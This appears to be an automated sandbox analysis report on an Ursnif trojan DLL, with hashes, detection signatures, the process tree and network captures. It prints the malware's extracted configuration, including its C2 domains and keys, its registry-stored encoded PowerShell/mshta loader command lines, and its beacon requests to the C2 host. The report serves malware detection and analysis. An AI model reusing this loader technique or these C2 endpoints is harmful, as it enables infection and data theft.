
Windows Analysis Report SecuriteInfo.com.Trojan.GenericKD.46602191.18619.30710

Overview

General Information

Sample Name: SecuriteInfo.com.Trojan.GenericKD.46602191.18619.30710 (renamed file extension from 30710 to dll)
Analysis ID: 446378
MD5: f3be390b01c85970deeae124ca36ce2d
SHA1: 93114ecf1b2c711ec10e1fafdc834393efc11a97
SHA256: 4eef8b6a5bcd808cd0ab0e33efcea2c2f9a36abe556e56556de8550383c9d3ce
Tags: dll

Detection

Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Sigma detected: Encoded IEX
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Ursnif
Allocates memory in foreign processes
Compiles code for process injection (via .Net compiler)
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Sigma detected: MSHTA Spawning Windows Shell
Sigma detected: Mshta Spawning Windows Shell
Sigma detected: Suspicious Csc.exe Source File Folder
Suspicious powershell command line found
Writes or reads registry keys via WMI
Writes registry values via WMI
Writes to foreign memory regions
Compiles C# or VB.Net code
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file does not import any functions
Queries the installation date of Windows
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 6320 cmdline: loaddll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46602191.18619.dll' MD5: 542795ADF7CC08EFCF675D65310596E8)
    • cmd.exe (PID: 6328 cmdline: cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46602191.18619.dll',#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 6348 cmdline: rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46602191.18619.dll',#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • control.exe (PID: 1500 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
    • rundll32.exe (PID: 6336 cmdline: rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46602191.18619.dll,Fatreply MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 6392 cmdline: rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46602191.18619.dll,Periodwait MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 6416 cmdline: rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46602191.18619.dll,Seemprove MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 6432 cmdline: rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46602191.18619.dll,Which MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • iexplore.exe (PID: 6188 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 4824 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6188 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
    • iexplore.exe (PID: 5648 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6188 CREDAT:82950 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
    • iexplore.exe (PID: 6376 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6188 CREDAT:82956 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • mshta.exe (PID: 5328 cmdline: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Rbex='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Rbex).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>' MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 4652 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 5872 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 1836 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\a5q0nxag\a5q0nxag.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 4728 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES4013.tmp' 'c:\Users\user\AppData\Local\Temp\a5q0nxag\CSCA0E183A53BA24AF88D541EA58AA2F519.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • csc.exe (PID: 1472 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\1t143vp1\1t143vp1.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 1380 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES4E4C.tmp' 'c:\Users\user\AppData\Local\Temp\1t143vp1\CSC76ED9B8CEB314CD89B53DEEDCE956C.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • explorer.exe (PID: 3424 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
  • cleanup

Malware Configuration

Threatname: Ursnif

{"lang_id": "RU, CN", "RSA Public Key": "48n489DADvQETiNETBHyPBGGvRa6csWtqIuLSVOWYWKKC10mrbaCDTGmXT9+yBdCxu5rsz9H10sEVOKS1YbQqCSO7vHhJ4AqplAi0EpahHSG6iAjqlB8Ka8e19eFq+oWTyXFXNaCOa1ztfMCxuyaqADn0yfjtWeuipBCZ+WgBEXPEGD6cctVIddqMNHa0kzmsNtadDWoPRLlm3WMxbPQCRP0dzRx5jDY+C8wai2SJ7DJITIcBRF1En7YoFGFEsOcJvmCr4+vI12IDpy+U6ARTXUjcxKOcCsi8f3JnvpXpMyaus8R6AAz7bUHl5rTZsgEcjzMHpe+df4LlMvsTqR94H38v4JAsBa+Wcc33Pvxw/o=", "c2_domain": ["gtr.antoinfer.com", "app.bighomegl.at"], "botnet": "1500", "server": "580", "serpent_key": "OkOYg3xmZhahWmvv", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "10"}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000003.00000003.831952409.0000000005899000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000000.00000002.917944713.0000000003698000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000003.00000003.818012728.0000000005918000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000003.00000003.817964029.0000000005918000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000000.00000003.872375871.0000000003698000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
(5 of 17 entries shown)

Unpacked PEs

Source | Rule | Description | Author | Strings
3.3.rundll32.exe.58994a0.2.raw.unpack | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |

Sigma Overview

System Summary:

Sigma detected: Encoded IEX
Source: Process started, Author: Florian Roth, Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Rbex='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Rbex).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 5328, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), ProcessId: 4652
Sigma detected: MSHTA Spawning Windows Shell
Source: Process started, Author: Michael Haag, Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Rbex='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Rbex).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 5328, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), ProcessId: 4652
Sigma detected: Mshta Spawning Windows Shell
Source: Process started, Author: Florian Roth, Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Rbex='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Rbex).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 5328, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), ProcessId: 4652
Sigma detected: Suspicious Csc.exe Source File Folder
Source: Process started, Author: Florian Roth, Data: Command: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\a5q0nxag\a5q0nxag.cmdline', CommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\a5q0nxag\a5q0nxag.cmdline', CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 4652, ProcessCommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\a5q0nxag\a5q0nxag.cmdline', ProcessId: 1836
Sigma detected: Non Interactive PowerShell
Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements), Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Rbex='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Rbex).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 5328, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), ProcessId: 4652

Jbx Signature Overview

AV Detection:

Found malware configuration
Source: 00000004.00000003.744049460.0000000003140000.00000040.00000001.sdmp, Malware Configuration Extractor: Ursnif {"lang_id": "RU, CN", "RSA Public Key": "48n489DADvQETiNETBHyPBGGvRa6csWtqIuLSVOWYWKKC10mrbaCDTGmXT9+yBdCxu5rsz9H10sEVOKS1YbQqCSO7vHhJ4AqplAi0EpahHSG6iAjqlB8Ka8e19eFq+oWTyXFXNaCOa1ztfMCxuyaqADn0yfjtWeuipBCZ+WgBEXPEGD6cctVIddqMNHa0kzmsNtadDWoPRLlm3WMxbPQCRP0dzRx5jDY+C8wai2SJ7DJITIcBRF1En7YoFGFEsOcJvmCr4+vI12IDpy+U6ARTXUjcxKOcCsi8f3JnvpXpMyaus8R6AAz7bUHl5rTZsgEcjzMHpe+df4LlMvsTqR94H38v4JAsBa+Wcc33Pvxw/o=", "c2_domain": ["gtr.antoinfer.com", "app.bighomegl.at"], "botnet": "1500", "server": "580", "serpent_key": "OkOYg3xmZhahWmvv", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "10"}
Multi AV Scanner detection for domain / URL
Source: gtr.antoinfer.com, Virustotal: Detection: 7%
Multi AV Scanner detection for submitted file
Source: SecuriteInfo.com.Trojan.GenericKD.46602191.18619.dll, Virustotal: Detection: 20%
Source: SecuriteInfo.com.Trojan.GenericKD.46602191.18619.dll, ReversingLabs: Detection: 20%
Source: SecuriteInfo.com.Trojan.GenericKD.46602191.18619.dll, Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe, File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll
Source: SecuriteInfo.com.Trojan.GenericKD.46602191.18619.dll, Static PE information: DYNAMIC_BASE, NX_COMPAT
Source: Binary string: partial method>An expression tree may not contain an unsafe pointer operationAAn expression tree may not contain an anonymous method expressionHAn anonymous method expression cannot be converted to an expression tree@Range variable '%1!ls!' cannot be assigned to -- it is read onlyPThe range variable '%1!ls!' cannot have the same name as a method type parameterKThe contextual keyword 'var' cannot be used in a range variable declarationaThe best overloaded Add method '%1!ls!' for the collection initializer has some invalid argumentsAAn expression tree lambda may not contain an out or ref parameterJAn expression tree lambda may not contain a method with variable argumentsSSpecify debug information file name (default: output file name with .pdb extension)$Specify a Win32 manifest file (.xml))Do not include the default Win32 manifestNSpecify an application configuration file containing assembly binding settings8Output line and column of the end location of each errorFBuild a Windows Runtime intermediate file that is consumed by WinMDExp Build an Appcontainer executable+Specify the preferred output language name.3Could not write to output file '%2!ls!' -- '%1!ls!' source: csc.exe, 00000017.00000002.886639113.0000020E19BA0000.00000002.00000001.sdmp, csc.exe, 00000019.00000002.894358562.000001466F560000.00000002.00000001.sdmp
Source: Binary string: wscui.pdbUGP source: explorer.exe, 0000001B.00000000.917016181.0000000005A00000.00000002.00000001.sdmp
Source: Binary string: ntdll.pdb source: rundll32.exe, 00000003.00000003.910017703.00000000064C0000.00000004.00000001.sdmp
Source: Binary string: ntdll.pdbUGP source: rundll32.exe, 00000003.00000003.910017703.00000000064C0000.00000004.00000001.sdmp
Source: Binary string: c:\Reply-quite\Cry_Country\523\Gave\Color\shape.pdb source: loaddll32.exe, 00000000.00000002.918197086.000000006D4EC000.00000002.00020000.sdmp, SecuriteInfo.com.Trojan.GenericKD.46602191.18619.dll
Source: Binary string: wscui.pdb source: explorer.exe, 0000001B.00000000.917016181.0000000005A00000.00000002.00000001.sdmp
Source: C:\Windows\System32\loaddll32.exe, Code function: 0_2_6D4E06DA FindFirstFileExW, 0_2_6D4E06DA

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic, Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49751 -> 165.232.183.49:80
Source: Traffic, Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49751 -> 165.232.183.49:80
Source: Traffic, Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49752 -> 165.232.183.49:80
Source: Traffic, Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49752 -> 165.232.183.49:80
Source: Traffic, Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49757 -> 165.232.183.49:80
Source: Traffic, Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49757 -> 165.232.183.49:80
Source: Joe Sandbox View, ASN Name: ALLEGHENYHEALTHNETWORKUS
Source: global traffic, HTTP traffic detected:
    GET /6jptEA6wC8OB7/q7vTQZto/d5CchjdbRrqZ5Z6Z_2Bg1vm/WfbX13QLJh/A2YEXLOoa_2F7tRm_/2FNwBUDimj6E/uPAUHKBNpk1/VjWeByKba7dA22/iqRSzqgEmB8mQYjX5o51W/j5ZXNQEryFUoJZBW/23tsS6zCPUWYtMD/UgNU1ARyOqPJE6n7Jx/XOgl3vdma/Y9s8AjQPcJNHAV_2FpBb/lOSs_2B_2Fregn_2FdZ/VSdKs_2FcaLNlVfbwth9Oi/4Vv_2ByCuk9fd/KEhpOJmg/c26kjnO4VZB2XIIXhQgYfGA/kb61PFLJEL/EFmfSuje8R4VMH6_2/BZs_2FmiZbLkWW5Nz8ToLf/Y HTTP/1.1
    Accept: text/html, application/xhtml+xml, image/jxr, */*
    Accept-Language: en-US
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
    Accept-Encoding: gzip, deflate
    Host: gtr.antoinfer.com
    Connection: Keep-Alive
Source: global traffic, HTTP traffic detected:
    GET /favicon.ico HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
    Host: gtr.antoinfer.com
    Connection: Keep-Alive
Source: global traffic, HTTP traffic detected:
    GET /iJicPEzpWLt9kIte6bxUGY/_2BR7ODZwRNCt/zjY2vw66/miliEkUQv2irt3ku_2FqNHB/akyqFQ_2BU/yM9SZV6ME7y_2FqkK/It7SIsAlfzad/nxZBZ52awi6/psN6Yj3z7wNsMk/xQu7epV5m4ODSAWDxLy1j/Gk_2FldXWGNOMAHD/fQa5bj6bJuGJvLC/_2BINvzSWHR8aC2WFb/3FD_2BoRU/0ETns47no1FSMZrZVvpo/oidVSWsyBZKZQ2VvZTQ/apd5gJV2bxCtRREtLzEP23/aQrm19tIQuqLU/uXn4W8I5/0vUbA5p07eFzebEv_2BENSg/QJGoAud5ASp7/0hsFWY2nQ/G HTTP/1.1
    Accept: text/html, application/xhtml+xml, image/jxr, */*
    Accept-Language: en-US
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
    Accept-Encoding: gzip, deflate
    Host: gtr.antoinfer.com
    Connection: Keep-Alive
Source: global traffic, HTTP traffic detected:
    GET /favicon.ico HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
    Host: gtr.antoinfer.com
    Connection: Keep-Alive
Source: global traffic, HTTP traffic detected:
    GET /7Ep6sOqsiggMUz11gUp6a/qtvd4K5Z0K1BVqPW/RYWSd53MfmcNiV5/RE881azalII7Gf_2BB/LlVOlbNj6/RPZQwcj8bJhS19L7epbH/8FoJWjd_2B_2FoGw2Bm/R78HTVyDDDMhzpL_2B_2BC/NT4N_2BZc5JJ5/UVDvzetX/v8gnM8_2BpN7NJffSmXgZSS/qqPoPFwQjt/P6AxMC53uAUww_2Bc/nxUF1jZoiqDv/fS2kjrbVKTg/KntWa8B08GJbBA/JKUoQSoG69VvL_2FI3TFW/zn35_2FieOhXHllq/8OehjRVegYhlQWm/W_2BILGcprIvR338Fg/HNspl_2F5/DJjDkA4zF03Nn8/04W HTTP/1.1
    Accept: text/html, application/xhtml+xml, image/jxr, */*
    Accept-Language: en-US
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
    Accept-Encoding: gzip, deflate
    Host: gtr.antoinfer.com
    Connection: Keep-Alive
Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmp, String found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmp, String found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmp, String found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmp, String found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmp, String found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
Source: unknown, DNS traffic detected: queries for: gtr.antoinfer.com
Source: global traffic, HTTP traffic detected:
    HTTP/1.1 404 Not Found
    Server: nginx
    Date: Fri, 09 Jul 2021 11:46:26 GMT
    Content-Type: text/html; charset=utf-8
    Transfer-Encoding: chunked
    Connection: close
    Content-Encoding: gzip
    Data Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a
    Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30
              Source: {46823123-E0AB-11EB-90EB-ECF4BBEA1588}.dat.11.drString found in binary or memory: http://gtr.antoinfer.com/6jptEA6wC8OB7/q7vTQZto/d5CchjdbRrqZ5Z6Z_2Bg1vm/WfbX13QLJh/A2YEXLOoa_2F7tRm_
              Source: loaddll32.exe, 00000000.00000002.916548304.0000000001300000.00000002.00000001.sdmp, explorer.exe, 0000001B.00000002.929662607.0000000001080000.00000002.00000001.sdmp, control.exe, 0000001C.00000002.916658121.0000014B47120000.00000002.00000001.sdmpString found in binary or memory: http://gtr.antoinfer.com/7Ep6sOqsiggMUz11gUp6a/qtvd4K5Z0K1BVqPW/RYWSd53MfmcNiV5/RE881azalII7Gf_
              Source: {4CE81F43-E0AB-11EB-90EB-ECF4BBEA1588}.dat.11.dr, ~DF80F9FBD8B5E4CA4D.TMP.11.drString found in binary or memory: http://gtr.antoinfer.com/7Ep6sOqsiggMUz11gUp6a/qtvd4K5Z0K1BVqPW/RYWSd53MfmcNiV5/RE881azalII7Gf_2BB/L
              Source: {46823125-E0AB-11EB-90EB-ECF4BBEA1588}.dat.11.dr, ~DFE5A3706066494A6C.TMP.11.drString found in binary or memory: http://gtr.antoinfer.com/iJicPEzpWLt9kIte6bxUGY/_2BR7ODZwRNCt/zjY2vw66/miliEkUQv2irt3ku_2FqNHB/akyqF
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://home.altervista.org/
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://home.altervista.org/favicon.ico
              Source: rundll32.exe, 00000003.00000003.902106165.00000000064A8000.00000004.00000040.sdmpString found in binary or memory: http://https://file://USER.ID%lu.exe/upd
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://ie.search.yahoo.com/os?command=
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://images.monster.com/favicon.ico
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://img.atlas.cz/favicon.ico
              Source: explorer.exe, 0000001B.00000000.919251022.0000000006BC3000.00000002.00000001.sdmpString found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
